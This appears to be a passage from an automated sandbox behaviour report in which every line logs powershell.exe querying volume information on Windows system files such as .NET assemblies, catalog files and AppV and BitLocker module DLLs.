Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
